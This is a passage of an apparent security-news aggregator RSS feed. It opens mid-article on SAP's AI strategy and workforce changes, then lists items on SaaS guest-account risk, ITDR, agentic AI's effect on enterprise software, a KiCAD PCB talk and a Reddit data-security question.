<p>이번 조치는 AI 전략을 한층 강화하려는 SAP의 행보를 보여주는 사례로 볼 수 있다. 여기에는 SAP의 AI 디지털 비서 ‘쥴(Joule)’에 대한 투자 확대도 포함된다. 앞서 지난 주 SAP CEO 크리스티안 클라인은 대부분의 AI 개발 조직을 직접 총괄하는 역할을 <a href="https://www.cio.com/article/4192000/sap-ai-%EC%A1%B0%EC%A7%81-ceo-%EC%A7%81%EC%86%8D%EC%9C%BC%EB%A1%9C-%EC%9E%AC%ED%8E%B8%EC%A0%9C%ED%92%88%C2%B7%EC%97%94%EC%A7%80%EB%8B%88%EC%96%B4%EB%A7%81-%EC%B4%9D%EA%B4%84-%EC%B2%B4.html">맡았다</a>. 지난 3월에는 영업, 구축, 서비스, 지원 조직의 관리 권한을 현재 최고고객책임자(CCO)를 맡고 있는 토마스 자우어에시히 이사회 멤버가 이끄는 고객가치그룹(Customer Value Group)으로 이관한 바 있다.</p>



<h2 class="wp-block-heading">고객이 체감할 수 있는 가치가 중요</h2>



<p>컨설팅 기업 인포테크리서치 그룹(Info-Tech Research Group)의 수석 리서치 디렉터 <a href="https://www.infotech.com/profiles/terra-higginson" target="_blank" rel="nofollow">테라 히긴슨</a>은 SAP가 AI 도입을 확대해 회사의 전략을 뒷받침하고 투자 효과를 입증해야 하는 상황이지만, “고객은 추가 예산을 투입하거나 운영 우선순위를 높이기 전에 AI가 어떤 가치를 제공하는지 보다 명확한 근거를 확인하기를 원한다”라고 말했다.</p>



<p>히긴슨은 SAP 역시 다른 소프트웨어 기업들과 마찬가지로 여러 압박에 직면해 있다고 분석했다. SaaS 기업의 시장 가치는 이전 호황기보다 여전히 크게 낮은 수준이며, AI는 구축과 운영, 확장에 많은 비용이 들어간다. 반면 AI가 얼마나 실질적인 수익을 가져다줄지는 아직 불확실하다.</p>



<p>히긴슨은 “지금은 비용을 공격적으로 늘릴 시기가 아니다”라며 “SAP는 경쟁 우위를 분명히 확보할 수 있는 분야에 집중적으로 투자해야 한다. AI 디지털 비서 쥴은 지금까지 기대에 미치지 못했지만, SAP는 사용자들에게 이를 적극 활성화하도록 독려하고 있는 것으로 알고 있다. 이런 점이 현실적인 긴장을 만들어내고 있다”라고 평가했다.</p>



<h2 class="wp-block-heading">AI가 바꾸는 인력 구조</h2>



<p>AI는 SAP가 2024년 구조조정 당시와 같은 대규모 감원을 피하려는 전략에도 영향을 미치고 있다. <a href="https://www.nytimes.com/2026/07/02/world/europe/germany-sap-ai-jobs-skilled-workers.html" target="_blank" rel="nofollow">뉴욕타임스에 따르면</a> SAP는 새로운 AI 기술을 활용해 직원들이 보다 높은 가치를 창출하는 새로운 역할을 만들어내도록 장려하고 있다.</p>



<p>또한 클라인 CEO는 머지않은 미래에 인력이 줄어드는 것이 아니라 지금과는 전혀 다른 형태의 인력 구성이 될 것으로 내다봤다. 그는 2~3년 뒤에도 사람이 직접 소프트웨어 코드를 작성하는 일이 남아 있을지 확신할 수 없다고 밝혔다.</p>



<p>또 다른 컨설팅 기업 무어인사이트앤드스트래티지(Moor Insights &amp; Strategy)의 부사장이자 수석 애널리스트인 <a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="nofollow">제이슨 앤더슨</a>은 직원들이 AI를 적극 활용하면 일상적인 업무 방식 자체가 달라진다고 설명했다. 예를 들어 소프트웨어 엔지니어는 코딩에 쓰던 시간이 줄어들면서 보안 점검이나 테스트 업무에 더 많은 시간을 투입하고 있다는 것이다.</p>



<p>앤더슨은 “하지만 이러한 업무 재배분은 아직 해결되지 않은 가장 큰 과제”라며 “미래의 업무 환경에 대한 논의와 그것이 현재 근로자에게 어떤 의미를 갖는지를 연결하는 핵심 고리가 아직 부족하다. 여기에 적어도 세 가지 요인이 당분간 이러한 변화의 정착을 어렵게 만들 것”이라고 말했다.</p>



<p>구체적으로 앤더슨은 AI가 업무 방식을 바꾸는 과정에서 해결해야 할 과제로 세 가지를 제시했다.</p>



<p>첫째, 현재 AI는 개인의 생산성을 높이는 데는 효과적이지만 팀 단위 협업을 지원하는 수준에는 아직 이르지 못했다.</p>



<p>둘째, AI 덕분에 과거에는 할 수 없었던 업무까지 수행할 수 있게 되면서 생산성이 크게 향상될 것이라는 기대가 있지만, 그런 업무 자체가 충분한 사업적 필요성을 갖추지 못한 경우도 적지 않다고 지적했다. 결국 AI로 확보한 생산성을 새로운 업무에 활용할 것인지, 아니면 단순히 비용과 예산을 줄이는 데 사용할 것인지가 기업의 과제로 남아 있다고 설명했다.</p>



<p>셋째, AI가 가져올 변화는 몇 달이나 몇 분기가 아니라 수년, 나아가 수십 년에 걸쳐 나타날 것이라고 전망했다. 자동화가 장기적으로는 오히려 일자리를 늘린다는 연구 결과를 고려하면, AI가 일자리를 변화시키더라도 결국 노동시장은 새로운 균형을 찾아갈 것이라고 내다봤다.</p>



<p>앤더슨은 SAP를 비롯한 기업들이 장기적인 경쟁력을 유지하기 위해 이러한 변화에 대응하는 것은 불가피하다고 평가했다. 다만 “단기적으로는 앞으로 나아가기 위해 많은 기업이 조직과 비용을 줄여야 할 것이며, 이는 영향을 받는 직원들에게는 결코 위로가 되지 않을 것”이라고 말했다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OAuth, guest accounts, and weak MFA drive SaaS risk]]></title>
<description><![CDATA[Organizations often create guest accounts to give contractors, suppliers, and partners temporary access to files and SaaS applications. Many of these accounts remain active long after they are needed, creating overlooked access paths to corporate data. Guest accounts accounted for…
Read more →
Th...]]></description>
<link>https://tsecurity.de/de/3647803/it-security-nachrichten/oauth-guest-accounts-and-weak-mfa-drive-saas-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647803/it-security-nachrichten/oauth-guest-accounts-and-weak-mfa-drive-saas-risk/</guid>
<pubDate>Mon, 06 Jul 2026 07:23:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Organizations often create guest accounts to give contractors, suppliers, and partners temporary access to files and SaaS applications. Many of these accounts remain active long after they are needed, creating overlooked access paths to corporate data. Guest accounts accounted for…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/oauth-guest-accounts-and-weak-mfa-drive-saas-risk/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/oauth-guest-accounts-and-weak-mfa-drive-saas-risk/">OAuth, guest accounts, and weak MFA drive SaaS risk</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OAuth, guest accounts, and weak MFA drive SaaS risk]]></title>
<description><![CDATA[Organizations often create guest accounts to give contractors, suppliers, and partners temporary access to files and SaaS applications. Many of these accounts remain active long after they are needed, creating overlooked access paths to corporate data. Guest accounts accounted for 69% of monitore...]]></description>
<link>https://tsecurity.de/de/3647742/it-security-nachrichten/oauth-guest-accounts-and-weak-mfa-drive-saas-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647742/it-security-nachrichten/oauth-guest-accounts-and-weak-mfa-drive-saas-risk/</guid>
<pubDate>Mon, 06 Jul 2026 06:52:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Organizations often create guest accounts to give contractors, suppliers, and partners temporary access to files and SaaS applications. Many of these accounts remain active long after they are needed, creating overlooked access paths to corporate data. Guest accounts accounted for 69% of monitored SaaS accounts in 2025, an increase of more than 1.9 million compared with the previous year, according to Kaseya’s 2026 SaaS Security Report: Closing the Unmanaged Trust Gap. They outnumber licensed users … <a href="https://www.helpnetsecurity.com/2026/07/06/saas-environments-security-risks-report/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/06/saas-environments-security-risks-report/">OAuth, guest accounts, and weak MFA drive SaaS risk</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise SAAS Phishing Attacks]]></title>
<description><![CDATA[Author: Black Hills Information Security - Bewertung: 0x - Views:6 🎧 Follow the Podcast - BHIS - Talkin' Bout [infosec] News https://bhisnews.transistor.fm
 
/// 🔗 Register for webcasts, summits, and workshops - 
https://poweredbybhis.com 
 
///Black Hills Infosec Socials
Twitter: https://twitter...]]></description>
<link>https://tsecurity.de/de/3646480/it-security-video/enterprise-saas-phishing-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646480/it-security-video/enterprise-saas-phishing-attacks/</guid>
<pubDate>Sun, 05 Jul 2026 11:18:35 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hills Information Security - Bewertung: 0x - Views:6 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/TZWk4Ah96tU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>🎧 Follow the Podcast - BHIS - Talkin' Bout [infosec] News https://bhisnews.transistor.fm<br />
 <br />
/// 🔗 Register for webcasts, summits, and workshops - <br />
https://poweredbybhis.com <br />
 <br />
///Black Hills Infosec Socials<br />
Twitter: https://twitter.com/BHinfoSecurity<br />
Mastodon: https://infosec.exchange/@blackhillsinfosec<br />
LinkedIn: https://www.linkedin.com/company/antisyphon-training<br />
Discord: https://discord.gg/ffzdt3WUDe<br />
<br />
///Black Hills Infosec Shirts & Hoodies<br />
https://spearphish-general-store.myshopify.com/collections/bhis-shirt-collections<br />
<br />
///Black Hills Infosec Services<br />
Active SOC: https://www.blackhillsinfosec.com/services/active-soc/<br />
Penetration Testing: https://www.blackhillsinfosec.com/services/<br />
Incident Response: https://www.blackhillsinfosec.com/services/incident-response/<br />
<br />
///Backdoors & Breaches - Incident Response Card Game<br />
Backdoors & Breaches: https://www.backdoorsandbreaches.com/<br />
Play B&B Online: https://play.backdoorsandbreaches.com/<br />
<br />
///Antisyphon Training<br />
Pay What You Can: https://www.antisyphontraining.com/pay-what-you-can/<br />
Live Training: https://www.antisyphontraining.com/course-catalog/<br />
On Demand Training: https://www.antisyphontraining.com/on-demand-course-catalog/<br />
Antisyphon Discord: https://discord.gg/antisyphon<br />
Antisyphon Mastodon: https://infosec.exchange/@Antisy_Training<br />
<br />
///Educational Infosec Content<br />
Black Hills Infosec Blogs: https://www.blackhillsinfosec.com/blog/<br />
Wild West Hackin' Fest YouTube: https://www.youtube.com/wildwesthackinfest<br />
Antisyphon Training YouTube: https://www.youtube.com/antisyphontraining<br />
Active Countermeasures YouTube: https://youtube.com/activecountermeasures<br />
Threat Hunter Community Discord: https://discord.gg/threathunter<br />
<br />
Join us at the annual information security conference in Deadwood, SD (in-person and virtually) — Wild West Hackin' Fest: https://wildwesthackinfest.com/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ITDR im SaaS-Dschungel: Identitätsschutz ohne klassisches IAM - it-daily.net]]></title>
<description><![CDATA[Die IT-Sicherheitsleitung hat in diesem Szenario keine Kontrolle darüber, ob für diese externen Konten sichere Passwörter verwendet werden oder ob ...]]></description>
<link>https://tsecurity.de/de/3646192/it-security-nachrichten/itdr-im-saas-dschungel-identitaetsschutz-ohne-klassisches-iam-it-dailynet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646192/it-security-nachrichten/itdr-im-saas-dschungel-identitaetsschutz-ohne-klassisches-iam-it-dailynet/</guid>
<pubDate>Sun, 05 Jul 2026 06:22:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die <b>IT</b>-Sicherheitsleitung hat in diesem Szenario keine Kontrolle darüber, ob für diese externen Konten sichere Passwörter verwendet werden oder ob ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie KI den Markt für Enterprise-Software umkrempelt]]></title>
<description><![CDATA[Werden traditionelle Enterprise-Anwendungen im Zeitalter der agentischen KI kollabieren? Wanan Wanan – shutterstock.com



Microsoft-CEO Satya Nadella sorgte kürzlich für Aufsehen, als er prognostizierte, dass traditionelle Enterprise-Anwendungen im Zeitalter der agentischen KI „kollabieren” würd...]]></description>
<link>https://tsecurity.de/de/3646174/it-security-nachrichten/wie-ki-den-markt-fuer-enterprise-software-umkrempelt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646174/it-security-nachrichten/wie-ki-den-markt-fuer-enterprise-software-umkrempelt/</guid>
<pubDate>Sun, 05 Jul 2026 06:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/07/shutterstock_2622295943.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Agentic AI" class="wp-image-4026482" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Werden traditionelle Enterprise-Anwendungen im Zeitalter der agentischen KI kollabieren?</figcaption></figure><p class="imageCredit"> Wanan Wanan – shutterstock.com</p></div>



<p>Microsoft-CEO Satya Nadella sorgte kürzlich für Aufsehen, als er prognostizierte, dass traditionelle Enterprise-Anwendungen im Zeitalter der agentischen KI „kollabieren” würden. Die Befürchtungen vieler Anleger, dass AI-Agenten den Markt für Unternehmenssoftware erschüttern werden, spitzten sich Anfang Februar zu, als die Veröffentlichung von Anthropic Cowork einen massiven Ausverkauf von Software-Aktien auslöste.</p>



<p>Ist die „SaaS-pocalypse“ lediglich ein Phänomen der Wall Street, oder hat sie auch Auswirkungen auf CIOs? Ist die Rhetorik „SaaS ist tot“ realistisch, oder ist sie maßlos übertrieben? Wir haben Branchenbeobachter befragt, womit sie rechnen.</p>



<h2 class="wp-block-heading">Etablierte Lieferanten sind im Vorteil</h2>



<p><em>Branchenausblick: Die aktuellen Marktführer werden ihre Dominanz auf absehbare Zeit ausüben, indem sie KI-Agenten in ihre Plattformen integrieren.</em></p>



<p>Forrester-Analystin Kate Leggett hat eine klare Meinung zur Zukunft des Softwaremarktes: „Es gibt einmal die Bewertungen von Investoren und dann gibt es die Realität, was in großen Unternehmen tatsächlich geschieht und in welchem Zeitrahmen Veränderungen stattfinden werden.“ Kernanwendungen würden so schnell nicht verschwinden, erklärt sie gegenüber unserer US-Schwesterpublikation <a href="https://www.deloitte.com/de/de/alliances/aws/about/aws-european-sovereign-cloud-deloitte.html" target="_blank" rel="noreferrer noopener">CIO</a>.com, auch wenn es an den Rändern zur Erosion komme. In welchem Zeitrahmen? „Es könnte Jahrzehnte dauern, bis alle Ausgaben vollständig von KI-Agenten übernommen werden.“</p>



<p><em><a href="https://www.cio.de/newsletter-anmeldung/" target="_blank">Abonnieren Sie unserer CIO-Newsletter</a> für mehr Analysen, Hintergründe und Deep Dives für die CIO-Community.</em></p>



<p>IT-Experte William Flaiz fügt hinzu: „Auf Führungsebene werden keine Entscheidungen getroffen, CRM-Systeme komplett abzuschaffen.“ Allerdings hätten <a href="https://www.deloitte.com/de/de/alliances/aws/about/aws-european-sovereign-cloud-deloitte.html" target="_blank" rel="noreferrer noopener">CIOs</a> in Unternehmen einen starken Anreiz, agentische KI in bestehende Plattformen zu integrieren, um mehr Wert aus ihren Investitionen herauszuholen. „Sie suchen nach Möglichkeiten, mit den ihnen zur Verfügung stehenden Tools bessere Ergebnisse zu erzielen“, sagt Flaiz.</p>



<p>„Hinsichtlich des Ausmaßes der Umwälzungen gibt es viel Schwarz-Weiß-Denken“, berichtet Alex Demeule, Senior <a href="https://www.deloitte.com/de/de/alliances/aws/about/aws-european-sovereign-cloud-deloitte.html" target="_blank" rel="noreferrer noopener">Analyst</a> bei Technology Business Review Inc. (TBRI). „Natürlich wird KI einen großen Einfluss auf Softwareanbieter haben. Aber in den kommenden fünf bis zehn Jahren sind sie viel besser positioniert für den Sprung ins KI-Zeitalter, als es der Aktienkurs vermuten lässt.“ Seine Prognose lautet, dass Agentic AI nur langsam eingeführt wird und Menschen noch viele Jahre lang eine Rolle spielen werden.</p>



<h2 class="wp-block-heading">Agentic AI wird Preismodelle revolutionieren</h2>



<p><em>Branchenausblick: Agentische KI wird einen grundlegenden Wandel von Abo-basierenden hin zu verbrauchs- oder ergebnisorientierten Preismodellen auslösen.</em></p>



<p>Dana Gardner, Präsident und Chefanalyst bei Interarbor Solutions, ist der Ansicht, dass es kurz- bis mittelfristig weniger darum geht, bestehende Software-Systeme komplett zu ersetzen. Vielmehr stehe das Ende der Preismacht ihrer Lieferanten bevor. „Versierte CIOs werden KI nutzen, um die Gesamtkosten der <a href="https://www.deloitte.com/de/de/alliances/aws/about/aws-european-sovereign-cloud-deloitte.html" target="_blank" rel="noreferrer noopener">IT</a> zu senken.” Schließlich seien KI-Agenten in der Lage, Verbrauchs- und Nutzungsmuster von Business-Applikationen zu verstehen. CIOs können diese Erkenntnisse in günstigere Verträge umsetzen.</p>



<p>In einem Bericht über die <a href="https://www.bain.com/insights/will-agentic-ai-disrupt-saas-technology-report-2025/" target="_blank" rel="noreferrer noopener">Auswirkungen von KI auf den SaaS-Markt</a> schreibt die Unternehmensberatung Bain &amp; Co.: „Wenn ein AI Agent eine menschliche Aufgabe ersetzt, erwarten Kunden, dass sie auf Basis der Ergebnisse bezahlen und nicht nach der Anzahl der Anmeldungen. Marktführer wie Intercom und Salesforce bewegen sich bereits in diese Richtung. Der grundlegende Wandel besteht darin, nicht mehr für den <a href="https://www.deloitte.com/de/de/alliances/aws/about/aws-european-sovereign-cloud-deloitte.html" target="_blank" rel="noreferrer noopener">Zugriff</a>, sondern für die geleistete Arbeit zu berechnen.“</p>



<p>Auch die Marktbeobachter von IDC stellen im Report „<a href="https://my.idc.com/getdoc.jsp?containerId=prUS53883425" target="_blank" rel="noreferrer noopener">FutureScape: Worldwide Agentic AI 2026 Predictions</a>“ fest, dass eine rein auf Nutzerlizenzen basierende Preisgestaltung bis 2028 überholt sein wird. So würden 70 Prozent der Softwareanbieter demnach ihre Preisstrategien auf neue Wertkennzahlen wie Verbrauch, Ergebnisse oder <a href="https://www.deloitte.com/de/de/alliances/aws/about/aws-european-sovereign-cloud-deloitte.html" target="_blank" rel="noreferrer noopener">organisatorische</a> Fähigkeiten umstellen.</p>



<p>Laut Forrester-Analystin Leggett werde sich die Abkehr von Abo-Preisen auf verschiedene Weise vollziehen. So könnte ein CIO, der ein Abonnement für 100 Lizenzen hat, beispielsweise 10 oder 20 dieser Lizenzen gegen eine nutzungs- oder ergebnisbasierte Abrechnung umtauschen. Lieferanten würden voraussichtlich Lizenzstufen oder flexible Optionen mit einer Art agentenbasierter Preisgestaltung anbieten.</p>



<h2 class="wp-block-heading">Softwareplattformen werden fusionieren und neue Rivalitäten schaffen</h2>



<p><em>Branchenausblick: Da KI-Agenten nicht unterscheiden, woher die Daten stammen, werden die Grenzen zwischen traditionellen Kategorien der Unternehmenssoftware wie CRM und ERP verschwimmen.</em></p>



<p>Um effektiv zu arbeiten, benötigen KI-Agenten Zugriff auf Daten, unabhängig davon, wo diese gespeichert sind. SaaS-Anbieter haben das erkannt und heben die Grenzen zwischen CRM, ERP, IT-Service-Management und anderen Kategorien auf. Leggett weist beispielsweise darauf hin, dass Lieferanten wie Oracle und Microsoft einheitliche Datenplattformen aufbauen. Diese lassen sich via Model Context Protocol (MCP) integrieren, um komplexe KI-basierte Workflows zu unterstützen.</p>



<ul class="wp-block-list">
<li>Oracle bietet eine integrierte Suite aus cloudbasierten ERP- und CRM-Anwendungen sowie eine vollständig verwaltete agentenbasierte Plattform an.</li>



<li>Microsoft offeriert unter dem Dach von Dynamics 365 sowohl ERP- als auch CRM-Funktionalitäten, ebenso wie branchenspezifische Lösungen auf Basis kleiner Sprachmodelle (SLMs), die schlanker und kostengünstiger sind als LLMs.</li>



<li>SAP integriert seine Signavio-Suite für Geschäftsprozess-Management, sein LeanIX-SaaS-Tool für Unternehmensarchitektur-Management sowie seinen Joule-AI-Agenten zu einem einheitlichen System.</li>



<li>Salesforce führt sein Mulesoft-Angebot für Integration und Automatisierung als Platform-as-a-Service mit seiner Data360-Kundendatenplattform und seiner Agentforce-AI-Plattform zusammen.</li>



<li>Das IT-Service-Management-Schwergewicht ServiceNow hat die Übernahme des Anbieters der agentischen KI-Plattform Moveworks abgeschlossen und Salesforce im CRM-Bereich herausgefordert.</li>
</ul>



<h2 class="wp-block-heading">Gewinner und Verlierer im Software-Sektor</h2>



<p><em>Branchenausblick: Agentic AI wird erhebliche Auswirkungen auf Anbieter von Einzelprodukten haben. Anbieter mit generischen Apps müssen kämpfen, während Lieferanten beispielsweise branchenspezifischer Tools besser aufgestellt sind.</em></p>



<p>Laut Analystin Leggett von Forrester werden Einzelprodukte wie Workflow-, Tabellenkalkulations- oder einfache Projektmanagement-Apps „in relativ kurzer Zeit verschwinden“, da sie leicht nachzubilden sind. Stark vertikalisierte Apps seien besser vor Disruption geschützt, da sie tiefgreifendes Fachwissen und Integrationen mit angrenzenden Systemen, beispielsweise aus den Bereichen CAD oder medizinische Bildgebung, bieten. Beispiele hierfür sind Epic und Cerner für das Management elektronischer Patientenakten (EHR), IQVIA für Pharmazie und Biowissenschaften oder Procore im Bauwesen.</p>



<p>Laut Leggett verfügen die großen Anbieter von CRM-Plattformen über eingebaute Vorteile: einen Schutzwall um ihre Daten, branchenspezifisches Wissen und Workflows, tiefe Partnernetzwerke, bewährte Branchen-Practices sowie Fachwissen in regulatorischen Feldern. Demeule von TBRI weist zudem darauf hin, dass etablierte Anbieter gerade deshalb langfristig Bestand haben, weil sie sich bei jeder Disruptionswelle erfolgreich neu ausrichten konnten – sei es beim Übergang von On-Premises-Lösungen zur Cloud oder bei der Umstellung von unbefristeten Lizenzen auf Abonnements.</p>



<h2 class="wp-block-heading">Vibe-Coding als Disruptor spezifischer Segmente</h2>



<p><em>Branchenausblick: Vibe-Coding könnte die Vormachtstellung der SaaS-Anbieter ins Wanken bringen und Endnutzern die Möglichkeit geben, ihre eigenen Agenten zu erstellen.</em></p>



<p>Vibe-Coding, also KI-Agenten zu verwenden, um Software auf Basis einfacher Eingaben in natürlicher Sprache zu erstellen, hebt die Low-Code- und No-Code-Bewegung auf eine neue Stufe. Mithilfe von Vibe-Coding können Software-Anwender KI-Dienste nutzen, um eine Produktivitäts-App zu erstellen, die über die Grenzen einer traditionellen CRM- oder ERP-Plattform hinausgeht.</p>



<p>Laut Leggett stellt Vibe-Coding eine echte Bedrohung dar, da es Arbeitnehmern potenziell ermöglicht, produktiver zu sein. So ließen sich traditionelle Plattformen für Enterprise-Software umgehen, auch weil sie von vielen Nutzern als aufgebläht und kompliziert angesehen werden.</p>



<p>Unternehmen, die technologisch rückständig sind, verfügen möglicherweise nicht über die Fähigkeiten oder das Selbstvertrauen, eigene Agenten zu entwickeln und einzusetzen, die geschäftskritische Arbeitsabläufe beeinflussen. „Vibe-Coding als punktuelle Lösung betrachten wir als disruptiv”, sagt Demeule. „Geschäftsmodelle für kleine, isolierte Lösungen geraten durch AI-Agenten in große Gefahr. Wer aber komplexe, unternehmenskritische Infrastrukturen managt, der ist aktuell sicher, weil KI diese Komplexität noch nicht beherrscht.“</p>



<h2 class="wp-block-heading">Eine agentische Orchestrierungsschicht entsteht</h2>



<p><em>Branchenausblick: Es wird weiterhin herkömmliche SaaS-Anwendungen geben, doch diese werden voraussichtlich hinter einer agentischen Orchestrierungsschicht verborgen sein.</em></p>



<p>Analysten sind sich einig, dass die Benutzeroberfläche der Zukunft nicht die herkömmliche SaaS-Lösung, sondern agentisch sein wird, während das CRM- oder ERP-System in den Hintergrund tritt. IDC-Analyst Bo Lykkegaard erläutert den Trend: „Komplexität ist die Achillesferse des SaaS-Modells. Jede SaaS-Anwendung erfordert eine eigene Lernkurve und Benutzeroberfläche, was bei sporadischer Nutzung schnell zu Ineffizienzen führt.“</p>



<p>KI biete hier eine überzeugende Lösung: Anstatt durch mehrere Dashboards zu navigieren, könnten Nutzer mit agentengesteuerten, dialogorientierten Schnittstellen interagieren, die systemübergreifend Aufgaben ausführen. Das Ergebnis? „KI als eine neue Schnittstellenschicht, die Komplexität abstrahiert, repetitive Prozesse automatisiert und neu definiert, wie Menschen Software nutzen.“ Die entscheidende Frage für die kommenden Jahre: Werden CIOs diese Funktionalität von ihren aktuellen Software-Lieferanten oder von Disruptoren wie OpenAI, Anthropic und Palantir beziehen? (ajf/jd)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ITDR im SaaS-Dschungel: Identitätsschutz ohne klassisches IAM]]></title>
<description><![CDATA[Identity Threat Detection and Response schließt die Überwachungslücke bei unmanaged SaaS-Diensten und meldet Verhaltensanomalien in Echtzeit.

Tags: #Cyber Security | #IAM]]></description>
<link>https://tsecurity.de/de/3646155/it-security-nachrichten/itdr-im-saas-dschungel-identitaetsschutz-ohne-klassisches-iam/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646155/it-security-nachrichten/itdr-im-saas-dschungel-identitaetsschutz-ohne-klassisches-iam/</guid>
<pubDate>Sun, 05 Jul 2026 05:21:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1000" height="563" src="https://www.it-daily.net/wp-content/uploads/2022/10/SaaS_shutterstock_1354886567.jpg" class="attachment-full size-full wp-post-image" alt="SaaS" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2022/10/SaaS_shutterstock_1354886567.jpg 1000w, https://www.it-daily.net/wp-content/uploads/2022/10/SaaS_shutterstock_1354886567-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2022/10/SaaS_shutterstock_1354886567-768x432.jpg 768w" sizes="(max-width: 1000px) 100vw, 1000px" title="ITDR im SaaS-Dschungel: Identitätsschutz ohne klassisches IAM 1"></p>
    Identity Threat Detection and Response schließt die Überwachungslücke bei unmanaged SaaS-Diensten und meldet Verhaltensanomalien in Echtzeit.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-security">#Cyber Security</a> | <a href="https://www.it-daily.net/thema/iam">#IAM</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Differential pair PCB design with KiCAD (cosin2026)]]></title>
<description><![CDATA[Did you ever wonder why many PCBs incorporate funny-looking "snakes" and "bumps" in their traces? Do you want to use USB3, Gbit Ethernet, PCI-Express or DVI/HDMI in your custom PCB designs? This talk may be for you. Intermediate understanding of electrical engineering concepts (impedance, wave fo...]]></description>
<link>https://tsecurity.de/de/3646142/it-security-video/differential-pair-pcb-design-with-kicad-cosin2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646142/it-security-video/differential-pair-pcb-design-with-kicad-cosin2026/</guid>
<pubDate>Sun, 05 Jul 2026 05:03:22 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Did you ever wonder why many PCBs incorporate funny-looking &quot;snakes&quot; and &quot;bumps&quot; in their traces? Do you want to use USB3, Gbit Ethernet, PCI-Express or DVI/HDMI in your custom PCB designs? This talk may be for you. Intermediate understanding of electrical engineering concepts (impedance, wave forms, digital signals) is recommended. I will use KiCAD to demonstrate concepts.

Thanks to the ubiquitous availability of fast electronic components, custom PCB design incorporating high-speed data transmission has become incredibly affordable. Two particular technologies are very useful for transmitting fast digital signals on a PCB: [Differential signalling](https://en.wikipedia.org/wiki/Differential_signalling) combined with [microstrip traces](https://en.wikipedia.org/wiki/Microstrip) into differential pairs. This talk presents practical aspects of designing PCBs with differential pairs, as well as why they are so useful.
about this event: https://fahrplan.cosin.ch/fahrplan/2026/events/a81732ae-3f67-50ab-87a2-484a70d8a0b7/]]></content:encoded>
</item>
<item>
<title><![CDATA[What ensures data security once sensitive data is scattered everywhere?]]></title>
<description><![CDATA[Forgive me if this question has an obvious answer. What becomes the control plane for enterprise data security once an organization's data is spread across S3, Snowflake, SaaS apps, exports, etc? Is it IAM, classification, data lineage, DLP, DSPM or a combination of all the above? And how are tea...]]></description>
<link>https://tsecurity.de/de/3646088/it-security-nachrichten/what-ensures-data-security-once-sensitive-data-is-scattered-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646088/it-security-nachrichten/what-ensures-data-security-once-sensitive-data-is-scattered-everywhere/</guid>
<pubDate>Sun, 05 Jul 2026 04:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Forgive me if this question has an obvious answer. What becomes the control plane for enterprise data security once an organization's data is spread across S3, Snowflake, SaaS apps, exports, etc?</p> <p>Is it IAM, classification, data lineage, DLP, DSPM or a combination of all the above? And how are teams making this work when quarterly access reviews are too slow for how fast data moves?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Beneficial_Winter927"> /u/Beneficial_Winter927 </a> <br> <span><a href="https://www.reddit.com/r/security/comments/1un4hvc/what_ensures_data_security_once_sensitive_data_is/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1un4hvc/what_ensures_data_security_once_sensitive_data_is/">[comments]</a></span>]]></content:encoded>
</item>
<item>
